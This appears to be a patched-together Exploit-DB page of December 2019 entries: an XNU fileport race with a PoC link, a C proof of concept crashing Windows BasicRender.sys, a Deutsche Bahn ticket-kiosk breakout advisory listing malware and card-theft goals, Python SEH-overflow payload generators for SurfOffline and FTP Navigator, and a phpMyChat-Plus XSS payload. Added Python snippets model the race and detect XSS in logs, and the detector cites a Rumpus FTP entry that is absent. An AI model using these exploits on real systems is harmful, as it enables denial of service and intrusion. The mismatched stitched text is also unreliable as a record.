First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running. This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.

One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.

The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified".

Tested on macOS 10.14.6 (18G87).

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip
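An added model of the ordering problem described above, written in Python and not taken from XNU: the kernel helpers are replaced by refcounted stand-ins, the racing thread is replayed as a single fileport_makeport() call in the window between procfdtbl_releasefd() and copyout(), and a publish-last ordering (an illustrative hardening assumed here, not Apple's actual patch) is run beside the vulnerable one.

```python
# Added model (not XNU code): Python stand-ins for the fileproc/fileglob
# lifecycle in wait_for_namespace_event(). Names mirror the kernel helpers in
# the advisory; objects carry explicit refcounts and 'freed' flags instead of
# real allocations, so the race is replayed as one fixed interleaving.

class FileGlob:
    def __init__(self):
        self.refcount = 1       # reference held by the owning fileproc
        self.freed = False


class FileProc:
    def __init__(self):
        self.fg = FileGlob()
        self.freed = False


class Proc:
    def __init__(self):
        self.fdtable = {}       # fd -> FileProc, visible to userspace
        self.reserved = {}      # fd -> FileProc, falloc'd but not yet visible
        self.next_fd = 3

    def falloc(self):
        """Reserve an fd slot and allocate its fileproc (hidden from userspace)."""
        fd, fp = self.next_fd, FileProc()
        self.next_fd += 1
        self.reserved[fd] = fp
        return fd, fp

    def procfdtbl_releasefd(self, fd):
        """Publish the reserved fd; from now on other syscalls can reach it."""
        self.fdtable[fd] = self.reserved.pop(fd)

    def fp_free(self, fd, fp):
        """Unconditional teardown, as the advisory describes: clears the fd and
        frees fileproc and fileglob without consulting outstanding references."""
        self.fdtable.pop(fd, None)
        self.reserved.pop(fd, None)
        fp.fg.freed = True
        fp.freed = True

    def fileport_makeport(self, fd):
        """Stand-in for the racing thread: take a fileglob reference through a
        published fd. Returns None when the fd is not visible (reserved only)."""
        fp = self.fdtable.get(fd)
        if fp is None:
            return None
        fp.fg.refcount += 1
        return fp.fg            # the fileport keeps this pointer


def wait_for_namespace_event(proc, copyout_ok, publish_last):
    """Replay one interleaving. The racer runs once, in the window after the
    fd work and before copyout(); publish_last selects the ordering."""
    fd, fp = proc.falloc()
    if not publish_last:
        proc.procfdtbl_releasefd(fd)        # vulnerable: published before copyout()
    captured = proc.fileport_makeport(fd)   # the other thread runs here
    if not copyout_ok:
        proc.fp_free(fd, fp)                # error path from the advisory
        return fd, captured
    if publish_last:
        proc.procfdtbl_releasefd(fd)        # hardened: publish after the last fallible step
    return fd, captured


def run_scenario(publish_last, copyout_ok=False):
    """Summarise one ordering and one copyout() outcome."""
    proc = Proc()
    fd, fg = wait_for_namespace_event(proc, copyout_ok, publish_last)
    return {
        "fd_visible": fd in proc.fdtable,
        "racer_got_ref": fg is not None,
        # a fileport still pointing at a freed fileglob is the use-after-free
        "dangling": fg is not None and fg.freed,
    }


if __name__ == "__main__":
    print("vulnerable ordering:", run_scenario(publish_last=False))
    print("publish-last ordering:", run_scenario(publish_last=True))
```

With the vulnerable ordering and a failing copyout(), the racer's reference survives fp_free() and points at a freed fileglob; with publish-last, the fd is never visible to the racer before the error path runs, so no reference can dangle.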
-
Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Date: 2019-12-20
# Exploit author: vportal
# Vendor homepage: http://www.microsoft.com
# Version: Windows 10 1803 x86
# Tested on: Windows 10 1803 x86
# CVE: N/A

# A NULL pointer dereference exists in the WARPGPUCMDSYNC function of the
# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
# to crash the system and deny the service to the rest of the users.

*PoC:*

#include <Windows.h>
#include <d3dkmthk.h>

#pragma comment(lib, "gdi32.lib")   // the D3DKMT* user-mode entry points are exported by gdi32

int main()
{
    D3DKMT_CREATEDEVICE* device = NULL;
    device = new D3DKMT_CREATEDEVICE();

    D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
    D3DKMTEnumAdapters(&enumAdapter);
    device->hAdapter = enumAdapter.Adapters[1].hAdapter;
    // logger(log_counter, "EnumAdapter");   // author's logging helper, not included in the PoC
    D3DKMTCreateDevice(device);

    D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
    contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
    memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
    contextVirtual->hDevice = device->hDevice;
    char data[0x200] = { 0 };
    memset(data, 0xff, 0x200);
    contextVirtual->PrivateDriverDataSize = 0x200;
    contextVirtual->pPrivateDriverData = data;
    contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
    contextVirtual->Flags.InitialData = 0x000001;
    contextVirtual->Flags.NullRendering = 0x0;

    D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
    submitCommand = new D3DKMT_SUBMITCOMMAND();
    submitCommand->BroadcastContext[0] = 0x40000240;
    for (int i = 0; i < 0x10; i++)
        submitCommand->WrittenPrimaries[i] = 0x0;
    submitCommand->PresentHistoryToken = 0x100;
    submitCommand->Commands = 0x004b39;
    submitCommand->CommandLength = 0x00000d;
    submitCommand->BroadcastContext[0] = contextVirtual->hContext;
    submitCommand->BroadcastContextCount = 0x1;
    submitCommand->Flags.PresentRedirected = 0x1;
    submitCommand->PrivateDriverDataSize = 0x130;
    char* PrivateData = NULL;
    PrivateData = new char[submitCommand->PrivateDriverDataSize];
    memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
    *(DWORD*)(PrivateData + 0x118) = 0x434e5953;
    *(DWORD*)(PrivateData + 0x11c) = 0x18;
    *(DWORD*)(PrivateData + 0x120) = 0x000110;
    *(DWORD*)(PrivateData + 0x124) = 0x000420;
    *(DWORD*)(PrivateData + 0x128) = 0x0;
    *(DWORD*)(PrivateData + 0x12c) = 0x000428;
    submitCommand->pPrivateDriverData = PrivateData;
    D3DKMTSubmitCommand(submitCommand);

    return 0;
}

--------------------------------------------------------------------------

*Crash dump*:

STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15

eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000 edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f    mov     dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope

--------------------------------------------------------------------------------

The vulnerability has only been tested in Windows 10 x86 1803.

CVSS Base Score: 5.5

Credit: Victor Portal
-
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP

Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered

Release Date:
=============
2019-12-14

Vulnerability Laboratory ID (VL-ID):
====================================
2191

Common Vulnerability Scoring System:
====================================
6.4

Vulnerability Class:
====================
Privilege Escalation

Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless of opening hours. Thus, the vending machine also secures sales in rural areas.
- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance
The ticket vending machine can also be configured according to individual requirements. The housing can be designed as desired. Customers can purchase their tickets with different means of payment. User guidance is available in different languages.

(Copy of the Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the Deutsche Bahn ticket vending machine series with Windows XP.
Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Authentication Type:
====================
No authentication (guest)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure Program

Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the official Deutsche Bahn ticket vending machine series for Windows. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to break out of the kiosk mode of the Deutsche Bahn vending machine application if the Password Agent (PasswordAgent.exe) of the system receives a timeout or has a runtime error in the program itself in the background. These errors can occur due to aborted sessions, unclean logout or common errors when using the application at system level. In the event of a local error, attackers can bring the error message to the foreground by pressing the number field - Cancel during a transaction. After the error message becomes visible, the attacker can click on a link in the error message where you can normally see what the error report contains. The attacker is then redirected to a form in the error message, where he can search for errors in a collection of Microsoft articles via "Submit / Don't Submit" or another link on the online path. There the attacker clicks on it and receives the web browser. From the web browser, the attacker opens the options menu, can access the local system directory and then has the ability to compromise the ticket vending machine with Windows XP.
The error message is normally deactivated on those devices through a hardening process of the service provider. In that special case the exception handling of Windows was not deactivated or set to the background, which allows the attacker to move through to other options and finally access the file system via the browser. The ticket vending machine vulnerability requires no user interaction and can only be exploited by local attackers with physical device access. No keyboard or front loader opening is required.

Vulnerable System(s):
[+] Windows XP

Affected Component(s):
[+] Exception Handling (Error Message Content)

Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) - Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local File System => PWND!

What are attackers able to do when the file system of the vending machine is accessible this way?
1. Injection of local malware into the ticket machine (editor / debugger / cmd / ps - e.g. ransomware/malware)
2. Local manipulation to assist skimming devices (transmit prepares)
3. Phishing of local credentials from the screen via the system (DB browser application)
4. Interception or manipulation to access card information (local file system - sniff/extract)
5. Crash or freeze the computer system (e.g. kill of process / loop script)
6. Scare or joke activities (e.g. html / js to front screens with web browser or by a new window process)

Reference(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG

Solution - Fix & Patch:
=======================
There are now several problems related to system hardening that can be resolved:
1. It should not be possible for users with system user rights to use the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser, messages & Co.)
4. Check that all other tasks are always running in the background or are being moved there permanently
5. The Deutsche Bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground
6. The activities of the testing were logged but did not trigger any alert for defense purposes

Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png

Security Risk:
==============
The security risk of the local ticket vending machine system vulnerability is estimated as high. The bug to escalate can be easily exploited by local interaction with the touch display to access the file system.

Credits & Authors:
==================
Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are the trademark of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
-
SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH

#!/usr/bin/python
payload = "A" * 382 + "B" * 4 + "C" * 4

try:
    fileCreate = open("exploit.txt", "w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except OSError:
    print("[!] File failed to be created")
-
FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: 8.03
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application click "FTP - Server" > "Custom Command"
# 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
# 4. Observe a program DOS crash, overwriting SEH

#!/usr/bin/python
payload = "A" * 4108 + "B" * 4 + "C" * 40

try:
    fileCreate = open("exploit.txt", "w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except OSError:
    print("[!] File failed to be created")
-
phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload: "><script>alert('xss')</script>

Vulnerable URL: http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
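As an added example for the two reflected XSS entries on this page (Rumpus FTP Web File Manager above and phpMyChat-Plus here), not part of either advisory: a small Python detector that URL-decodes the query string of constructed access-log lines and flags the payload shapes shown, including the mixed-case svg/onload form that uses '/' as a separator and backtick call syntax. The log lines are made up for the example; the paths and payloads are the ones from the two advisories.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style, not real traffic):
# a benign login, the Rumpus-style svg/onload payload, the phpMyChat-style
# script-tag payload, and a URL-encoded variant of the latter.
SAMPLE_LOG = [
    r"""10.0.0.5 - - [14/Dec/2019:10:00:01 +0000] "GET /Login?login=alice HTTP/1.1" 200 512""",
    r"""10.0.0.9 - - [14/Dec/2019:10:00:02 +0000] "GET /Login?!'><sVg/OnLoAD=alert`1`// HTTP/1.1" 200 634""",
    r"""10.0.0.9 - - [19/Dec/2019:10:00:03 +0000] "GET /plus/pass_reset.php?L=english&pmc_username=\"><script>alert('xss')</script> HTTP/1.1" 200 700""",
    r"""10.0.0.9 - - [19/Dec/2019:10:00:04 +0000] "GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700""",
]

# Extracts method and request target from the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Rules are evaluated against the decoded, lower-cased query string.
XSS_RULES = {
    "script_tag": re.compile(r"<\s*script\b"),
    "svg_tag": re.compile(r"<\s*svg\b"),
    # an on* event-handler attribute; '/' is accepted as the tag/attribute separator
    "event_handler": re.compile(r"[\s/]on[a-z]+\s*="),
    # a JS call with either parentheses or the backtick (template literal) form
    "js_call": re.compile(r"\b(?:alert|prompt|confirm|eval)\s*[(`]"),
}


def normalize(target):
    """Split the request target and return (path, decoded lower-cased query)."""
    path, _, query = target.partition("?")
    decoded = query
    for _ in range(3):                  # bounded loop defeats double encoding
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    return path, decoded.lower()


def analyze_line(line):
    """Return (path, [matched rule names]) or None if no request field is found."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, query = normalize(m.group("target"))
    hits = [name for name, rx in XSS_RULES.items() if rx.search(query)]
    return path, hits


def find_xss_attempts(lines):
    """Return (line_no, path, hits) for every line whose query matched a rule."""
    findings = []
    for number, line in enumerate(lines, 1):
        result = analyze_line(line)
        if result and result[1]:
            findings.append((number, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for number, path, hits in find_xss_attempts(SAMPLE_LOG):
        print(f"line {number}: {path} matched {', '.join(hits)}")
```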